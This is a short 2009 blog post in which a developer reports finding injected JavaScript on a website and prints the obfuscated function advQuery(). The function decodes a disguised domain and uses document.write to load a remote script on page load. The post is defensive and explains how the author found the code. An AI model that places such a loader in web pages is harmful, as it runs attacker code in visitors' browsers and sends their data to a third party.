Javascript hack advQuery()

Posted by John Andersen | Jul 9, 2009 | Programming | 0 |

Just today I came across a javascript hack that was sending information for website users to a third party location.

The way I found this out â€“ other than getting malware notices from Google, was to do a wireshark trace on the offending website. From there I saw some interesting requests. Upon closer inspection, I found a piece of code with this function that I did not recognize:

function advQuery(){
var Host=â€http://google.com/â€;Track=â€/if.phpâ€;get=unescape(â€%6E%65%74â€³);
document.write(unescape(â€%3Cscript src=â€™â€+Host.substr(0,9)+unescape(â€\u0030\u0030â€³)+Host.substr(9,5)+get));
document.write(unescape(Track+â€â€˜ type=â€™text/javascriptâ€™%3E%3C/script%3Eâ€));
};advQuery();

It is easy enough to clear up, but now I need to find out how it got there!

About The Author

John Andersen

John is the Co-Founder of Yansa Labs (www.YansaLabs.com). John founded Yansa Labs as a company dedicated to building innovative solutions on the ServiceNow platform. He is a major contributor to the ServiceNow ecosystem. John served as the platform and integration architect at the company for several years.

Search

Recent Blog Posts

Installing ServiceNow Store Apps from a Developer Instance
Jun 30, 2020 | Service-Now, ServiceNow
Adding support for additional Database Server types in ServiceNow imports
Apr 15, 2020 | Service-Now, ServiceNow, ServiceNow Training Videos
Creating list-based UI Actions without selecting a record
Mar 18, 2020 | Blog, Service-Now, ServiceNow
Knowledge 18 – Let’s Talk!
May 2, 2018 | ServiceNow
Endpoints in Integrations – Use Case
Jul 21, 2017 | Blog, Service-Now

Subscribe to My ServiceNow Blog